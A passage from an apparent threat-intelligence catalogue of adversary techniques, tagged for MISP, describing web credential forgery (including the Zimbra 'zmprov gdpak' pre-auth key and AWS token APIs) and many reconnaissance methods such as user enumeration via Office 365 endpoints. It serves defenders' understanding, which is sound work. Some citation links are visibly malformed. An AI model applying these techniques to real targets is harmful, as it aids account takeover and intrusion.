Once forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://app.tidalcyber.com/technique/d36a5323-e249-44e8-9c8b-5cc9c023a5e1)), which may bypass multi-factor and other authentication protection mechanisms.<sup>[[Volexity SolarWinds](https://app.tidalcyber.com/references/355cecf8-ef3e-4a6e-a652-3bf26fe46d88)]</sup><sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup><sup>[[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)]</sup>

The tag is: misp-galaxy:technique="Web Cookies"

Forge Web Credentials

Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.

Adversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e), [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a), or other cryptographic seed values.<sup>[[GitHub AWS-ADFS-Credential-Generator](https://app.tidalcyber.com/references/340a3a20-0ee1-4fd8-87ab-10ac0d2a50c8)]</sup> Adversaries may also forge tokens by taking advantage of features such as the AssumeRole and GetFederationToken APIs in AWS, which allow users to request temporary security credentials (i.e., [Temporary Elevated Cloud Access](https://app.tidalcyber.com/technique/448dc009-2d3f-5480-aba3-0d80dc4336cd)), or the zmprov gdpak command in Zimbra, which generates a pre-authentication key that can be used to generate tokens for any user in the domain.<sup>[[AWS Temporary Security Credentials](https://app.tidalcyber.com/references/c6f29134-5af2-42e1-af4f-fbb9eae03432)]</sup><sup>[[Zimbra Preauth](https://app.tidalcyber.com/references/f8931e8d-9a03-5407-857a-2a1c5a895eed)]</sup>

Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://app.tidalcyber.com/technique/28f65214-95c1-4a72-b385-0b32cbcaea8f)), which may bypass multi-factor and other authentication protection mechanisms.<sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup><sup>[[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)]</sup><sup>[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)]</sup>

The tag is: misp-galaxy:technique="Forge Web Credentials"

Client Configurations

Adversaries may gather information about the victim’s client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup> Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="Client Configurations"

Firmware

Adversaries may gather information about the victim’s host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).<sup>[[ArsTechnica Intel](https://app.tidalcyber.com/references/99151b50-3dd8-47b5-a48f-2e3b450944e9)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a)).

The tag is: misp-galaxy:technique="Firmware"

Hardware

Adversaries may gather information about the victim’s host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup> Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://app.tidalcyber.com/technique/53fea37d-be26-4bed-a8a1-1d67f7cbffcf) or [Hardware Additions](https://app.tidalcyber.com/technique/4557bfb9-b940-49b6-b8be-571979134419)).

The tag is: misp-galaxy:technique="Hardware"

Software

Adversaries may gather information about the victim’s host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup> Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or for initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="Software"

Gather Victim Host Information

Adversaries may gather information about the victim’s hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup> Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="Gather Victim Host Information"

Credentials

Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.

Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup> Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://app.tidalcyber.com/technique/62bc11f9-f88c-437a-98ae-e90def576e7e), breach dumps, code repositories, etc.).<sup>[[Register Deloitte](https://app.tidalcyber.com/references/e6b10687-8666-4c9c-ac77-1988378e096d)]</sup><sup>[[Register Uber](https://app.tidalcyber.com/references/89b85928-a962-4230-875c-63742b3c9d37)]</sup><sup>[[Detectify Slack Tokens](https://app.tidalcyber.com/references/46c40ed4-5a15-4b38-b625-bebc569dbf69)]</sup><sup>[[Forbes GitHub Creds](https://app.tidalcyber.com/references/303f8801-bdd6-4a0c-a90a-37867898c99c)]</sup><sup>[[GitHub truffleHog](https://app.tidalcyber.com/references/324a563f-55ee-49e9-9fc7-2b8e35f36875)]</sup><sup>[[GitHub Gitrob](https://app.tidalcyber.com/references/1dee0842-15cc-4835-b8a8-938e0c94807b)]</sup><sup>[[CNET Leaks](https://app.tidalcyber.com/references/46df3a49-e7c4-4169-b35c-0aecc78c31ea)]</sup> Adversaries may also purchase credentials from dark web or other black-markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).<sup>[[Okta Scatter Swine 2022](https://app.tidalcyber.com/references/66d1b6e2-c069-5832-b549-fc5f0edeed40)]</sup>

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).

The tag is: misp-galaxy:technique="Credentials"

Email Addresses

Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.

Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites]([HackersArise Email(https://app.tidalcyber.com/references/b6aefd99-fd97-4ca0-b717-f9dc147c9413)]</sup><sup>[[CNET Leaks](https://app.tidalcyber.com/references/46df3a49-e7c4-4169-b35c-0aecc78c31ea)]</sup> Email addresses could also be enumerated via more active means (i.e. [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85)), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.<sup>[[GrimBlog UsernameEnum](https://app.tidalcyber.com/references/cab25908-63da-484d-8c42-4451f46086e2)]</sup> For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.<sup>[[GitHub Office 365 User Enumeration](https://app.tidalcyber.com/references/314fb591-d5f2-4f0c-ab0b-97977308b5dc)]</sup><sup>[[Azure Active Directory Reconnaisance](https://app.tidalcyber.com/references/42dad2a3-5b33-4be4-a19b-58a27fb3ee5d)]</sup>

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Email Accounts](https://app.tidalcyber.com/technique/49ae7bf1-a313-41d6-ad4c-74efc4c80ab6)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) via [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="Email Addresses"

Employee Names

Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.

Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites]([OPM Leak(https://app.tidalcyber.com/references/b67ed4e9-ed44-460a-bd59-c978bdfda32f)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).

The tag is: misp-galaxy:technique="Employee Names"

Gather Victim Identity Information

Adversaries may gather information about the victim’s identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.<sup>[[GrimBlog UsernameEnum](https://app.tidalcyber.com/references/cab25908-63da-484d-8c42-4451f46086e2)]</sup> Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites]([OPM Leak(https://app.tidalcyber.com/references/b67ed4e9-ed44-460a-bd59-c978bdfda32f)]</sup><sup>[[Register Deloitte](https://app.tidalcyber.com/references/e6b10687-8666-4c9c-ac77-1988378e096d)]</sup><sup>[[Register Uber](https://app.tidalcyber.com/references/89b85928-a962-4230-875c-63742b3c9d37)]</sup><sup>[[Detectify Slack Tokens](https://app.tidalcyber.com/references/46c40ed4-5a15-4b38-b625-bebc569dbf69)]</sup><sup>[[Forbes GitHub Creds](https://app.tidalcyber.com/references/303f8801-bdd6-4a0c-a90a-37867898c99c)]</sup><sup>[[GitHub truffleHog](https://app.tidalcyber.com/references/324a563f-55ee-49e9-9fc7-2b8e35f36875)]</sup><sup>[[GitHub Gitrob](https://app.tidalcyber.com/references/1dee0842-15cc-4835-b8a8-938e0c94807b)]</sup><sup>[[CNET Leaks](https://app.tidalcyber.com/references/46df3a49-e7c4-4169-b35c-0aecc78c31ea)]</sup>

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).

The tag is: misp-galaxy:technique="Gather Victim Identity Information"

DNS

Adversaries may gather information about the victim’s DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.<sup>[[Sean Metcalf Twitter DNS Records](https://app.tidalcyber.com/references/c7482430-58f9-4365-a7c6-d17067b257e4)]</sup>

Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://app.tidalcyber.com/technique/758ad44d-5e29-4c7f-8dae-ddfeb5092ccb). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases]([DNS Dumpster(https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439), [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6), or [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="DNS"

Domain Properties

Adversaries may gather information about the victim’s network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS]([WHOIS(https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup><sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup> Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.<sup>[[Azure Active Directory Reconnaisance](https://app.tidalcyber.com/references/42dad2a3-5b33-4be4-a19b-58a27fb3ee5d)]</sup><sup>[[Office 265 Azure Domain Availability](https://app.tidalcyber.com/references/dddf33ea-d074-4bc4-98d2-39b7e843e37d)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439), [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6), or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).

The tag is: misp-galaxy:technique="Domain Properties"

IP Addresses

Adversaries may gather the victim’s IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases]([WHOIS(https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup><sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="IP Addresses"

Network Security Appliances

Adversaries may gather information about the victim’s network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information]([Nmap Firewalls NIDS(https://app.tidalcyber.com/references/c696ac8c-2c7a-4708-a369-0832a493e0a6)]</sup> Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="Network Security Appliances"

Network Topology

Adversaries may gather information about the victim’s network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites]([DNS Dumpster(https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="Network Topology"

Network Trust Dependencies

Adversaries may gather information about the victim’s network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases]([Pentesting AD Forests(https://app.tidalcyber.com/references/3ca2e78e-751e-460b-9f3c-f851d054bce4)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).

The tag is: misp-galaxy:technique="Network Trust Dependencies"

Gather Victim Network Information

Adversaries may gather information about the victim’s networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.

